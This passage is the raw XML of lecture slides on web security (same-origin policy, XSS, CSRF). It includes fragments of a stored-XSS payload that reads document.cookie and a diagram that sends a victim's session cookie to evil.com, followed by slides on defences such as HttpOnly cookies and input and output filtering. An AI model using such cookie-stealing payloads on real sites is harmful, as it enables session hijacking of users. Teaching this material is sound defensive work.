              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>'"&gt;'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>);&lt;/script&gt;</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7938" y="4739432"/>
            <a:ext cx="1005227" cy="1005227"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3454906" y="5882073"/>
            <a:ext cx="2831289" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Origin: www.friendly.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>session=xI4f-Qs02fd</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8709019" y="6176529"/>
            <a:ext cx="1056507" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>evil.com</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550" y="3094062"/>
            <a:ext cx="893446" cy="893446"/>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550" y="5269304"/>
            <a:ext cx="893446" cy="893446"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8498032" y="4034121"/>
            <a:ext cx="1478482" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>friendly.com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4585" y="5069440"/>
            <a:ext cx="641882" cy="64188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827" y="3540785"/>
            <a:ext cx="1245186" cy="1245186"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="51" name="Group 50"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5307691" y="5224046"/>
            <a:ext cx="3344897" cy="487276"/>
            <a:chOff x="5307691" y="5224046"/>
            <a:chExt cx="3344897" cy="487276"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="29" name="Straight Arrow Connector 28"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5307691" y="5557252"/>
              <a:ext cx="3344897" cy="1540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5159">
              <a:off x="5878715" y="5224046"/>
              <a:ext cx="2202847" cy="400110"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0"/>
                <a:t>5) GET /?session=…</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="49" name="Group 48"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5307691" y="3638353"/>
            <a:ext cx="3344897" cy="1101079"/>
            <a:chOff x="5307691" y="3638353"/>
            <a:chExt cx="3344897" cy="1101079"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="22" name="Straight Arrow Connector 21"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="5307691" y="3638353"/>
              <a:ext cx="3344897" cy="11010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20496064">
              <a:off x="5342946" y="3799599"/>
              <a:ext cx="3087811" cy="400110"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0"/>
                <a:t>3) GET /</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
                <a:t>profile.php?uid</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0"/>
                <a:t>=…</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="50" name="Group 49"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5508441" y="3976776"/>
            <a:ext cx="3144148" cy="1044932"/>
            <a:chOff x="5508441" y="3976776"/>
            <a:chExt cx="3144148" cy="1044932"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="23" name="Straight Arrow Connector 22"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="5508441" y="3976776"/>
              <a:ext cx="3144148" cy="10449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20488569">
              <a:off x="6177014" y="4431822"/>
              <a:ext cx="2215286" cy="400110"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0"/>
                <a:t>4) HTTP/1.1 200 OK</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="48" name="Group 47"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1260330" y="4176550"/>
            <a:ext cx="3107608" cy="1065496"/>
            <a:chOff x="1260330" y="4176550"/>
            <a:chExt cx="3107608" cy="1065496"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="26" name="Straight Arrow Connector 25"/>
            <p:cNvCxnSpPr>
              <a:endCxn id="11" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1260330" y="4564443"/>
              <a:ext cx="3107608" cy="6776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772489">
              <a:off x="1531450" y="4176550"/>
              <a:ext cx="2792728" cy="707886"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0"/>
                <a:t>2) Send link to attacker’s profile to the victim</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="47" name="Group 46"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1356049" y="2907711"/>
            <a:ext cx="7321420" cy="1123113"/>
            <a:chOff x="1356049" y="2907711"/>
            <a:chExt cx="7321420" cy="1123113"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="45" name="Freeform 44"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1356049" y="2907711"/>
              <a:ext cx="7321420" cy="1123113"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 7321420"/>
                <a:gd name="connsiteY0" fmla="*/ 1123113 h 1123113"/>
                <a:gd name="connsiteX1" fmla="*/ 1150775 w 7321420"/>
                <a:gd name="connsiteY1" fmla="*/ 258477 h 1123113"/>
                <a:gd name="connsiteX2" fmla="*/ 5200261 w 7321420"/>
                <a:gd name="connsiteY2" fmla="*/ 3440 h 1123113"/>
                <a:gd name="connsiteX3" fmla="*/ 7321420 w 7321420"/>
                <a:gd name="connsiteY3" fmla="*/ 395326 h 1123113"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX2" y="connsiteY2"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX3" y="connsiteY3"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="7321420" h="1123113">
                  <a:moveTo>
                    <a:pt x="0" y="1123113"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="142032" y="784101"/>
                    <a:pt x="284065" y="445089"/>
                    <a:pt x="1150775" y="258477"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2017485" y="71865"/>
                    <a:pt x="4171820" y="-19368"/>
                    <a:pt x="5200261" y="3440"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6228702" y="26248"/>
                    <a:pt x="6775061" y="210787"/>
                    <a:pt x="7321420" y="395326"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="57150">
              <a:solidFill>
                <a:schemeClr val="accent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rot="21434316">
              <a:off x="3324046" y="3025549"/>
              <a:ext cx="3388688" cy="400110"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0"/>
                <a:t>1) Post malicious JS to profile</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="636238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down)">
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="50"/>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Mitigating XSS Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1673818"/>
            <a:ext cx="10515600" cy="4969578"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Client-side defenses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="769728" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cookie restrictions – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>HttpOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and Secure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="769728" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Client-side filter – X-XSS-Protection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enables heuristics in the browser that attempt to block injected scripts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server-side defenses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="769728" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Input validation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="937584" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>x = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>request.args.get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="937584" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>if not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>is_valid_base64(x): abort(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>500</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="769728" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Output filtering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="312528" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	&lt;div </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>id=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"content"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>{{sanitize(data)}}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/div&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3003146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HttpOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>One approach to defending against cookie stealing: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HttpOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server may specify that a cookie should </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> be exposed in the DOM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>But they are still sent with requests as normal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Not to be confused with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Secure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cookies marked as Secure may only be sent over HTTPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Website designers should, ideally, enable both features</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Does </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>HttpOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> prevent all attacks?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Of course not, it only prevents cookie theft</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Other private data may still be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>exfiltrated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> from the origin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2707767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500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="7" end="7"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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7" end="7"/>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="2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Web Security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828801" y="2743200"/>
            <a:ext cx="9497484" cy="2672522"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Same Origin Policy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Cross Site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cross Site Request Forgery (CSRF)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18225621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Request Forgery (CSRF)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CSRF is another of the basic web attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacker tricks victim into accessing URL that performs an unauthorized action</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Avoids the need to read private state (e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Abuses the SOP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>All requests to origin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>D*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> will include </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>D*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’s cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>… even if some other origin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> sends the request to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>D*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2134755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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="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Website</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
